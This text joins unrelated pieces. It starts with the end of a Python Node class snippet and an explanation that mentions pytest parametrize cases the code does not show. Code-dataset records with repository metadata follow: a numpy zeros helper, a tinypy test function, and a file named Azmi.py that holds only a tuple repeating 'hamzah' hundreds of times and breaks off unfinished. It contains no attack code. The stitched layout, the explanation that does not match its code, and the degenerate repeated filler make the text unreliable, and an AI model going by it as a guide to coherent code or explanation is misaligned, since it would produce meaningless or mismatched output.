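            and self.values == other.values
            and self.location == other.location
        )

    def __repr__(self):
        return (
            f"Node(name={self.name!r}, directives={self.directives!r}, "
            f"values={self.values!r}, location={self.location!r})"
        )

a = Node("n", "d", "v", "loc")
b = Node("n", "d", "v", "loc")
print(a == b, a == Ellipsis)  # True False
print(repr(a))
```

Each `pytest.mark.parametrize` case above flips exactly one attribute to confirm that any single mismatch breaks equality, plus one all-equal case and one foreign-type (`Ellipsis`) case.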
e9061f8873671fd6b2a35762d2456872ef36b0db | 65 | py | Python | lambda/core/mathutils.py | juanjoSanz/terraform-terragrunt-aws-lambda-tutorial | ed5a238aad6f26915562a934efd83a2c618ec862 | [
"MIT"
] | 16 | 2020-12-13T23:25:54.000Z | 2022-02-24T11:38:05.000Z | lambda/core/mathutils.py | srinivas325/terraform-terragrunt-aws-lambda-tutorial | ed5a238aad6f26915562a934efd83a2c618ec862 | [
"MIT"
] | null | null | null | lambda/core/mathutils.py | srinivas325/terraform-terragrunt-aws-lambda-tutorial | ed5a238aad6f26915562a934efd83a2c618ec862 | [
"MIT"
] | 10 | 2021-01-22T09:59:48.000Z | 2022-02-24T11:38:08.000Z | import numpy
def get_zeros():
return numpy.zeros((2,2))
| 13 | 30 | 0.630769 | 10 | 65 | 4 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04 | 0.230769 | 65 | 4 | 31 | 16.25 | 0.76 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
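`get_zeros` wraps `numpy.zeros((2, 2))`, which allocates a 2x2 array of float64 zeros. A brief usage sketch (assumes numpy is installed):

```python
import numpy

def get_zeros():
    # Shape is passed as a tuple; dtype defaults to float64.
    return numpy.zeros((2, 2))

z = get_zeros()
print(z.shape, z.dtype, z.sum())  # (2, 2) float64 0.0
```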
3aa6a2f3a9fce58e57562d451bf2499c4a000f5d | 23 | py | Python | test/tinypy/tinypy/tmp1.py | xupingmao/subpy | c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4 | [
"MIT"
] | 6 | 2015-10-11T15:06:54.000Z | 2016-07-03T06:06:52.000Z | test/tinypy/tinypy/tmp1.py | xupingmao/snake | c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4 | [
"MIT"
] | 7 | 2015-08-03T12:01:21.000Z | 2016-04-24T09:00:09.000Z | test/tinypy/tinypy/tmp1.py | xupingmao/snake | c956f151ed1ebd2faeaf1565352b59ca5a8fa0b4 | [
"MIT"
] | 2 | 2016-04-18T14:51:25.000Z | 2016-04-18T15:07:09.000Z | def test(): print('OK') | 23 | 23 | 0.608696 | 4 | 23 | 3.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 23 | 1 | 23 | 23 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | true | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 7 |
3ab41316ba274efd06ec09a6db0adc4dd732ea8b | 392,020 | py | Python | Azmi.py | azmatalism/Azmi | faaa21da25973a583106b71fca3fd3c7e933c9fa | [
"Apache-2.0"
] | null | null | null | Azmi.py | azmatalism/Azmi | faaa21da25973a583106b71fca3fd3c7e933c9fa | [
"Apache-2.0"
] | null | null | null | Azmi.py | azmatalism/Azmi | faaa21da25973a583106b71fca3fd3c7e933c9fa | [
"Apache-2.0"
] | null | null | null | hamzah=(
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
"hamzah","hamzah","hamzah","hamzah",
